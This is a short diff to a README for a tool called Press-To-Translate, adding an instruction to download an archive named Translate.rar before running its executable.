acybersec-64/Press-To-Translate/README.md

 # Installation:

-# Run exe File and start from Step 2
+# Download Translate.rar Run exe File and start from Step 2

 # Or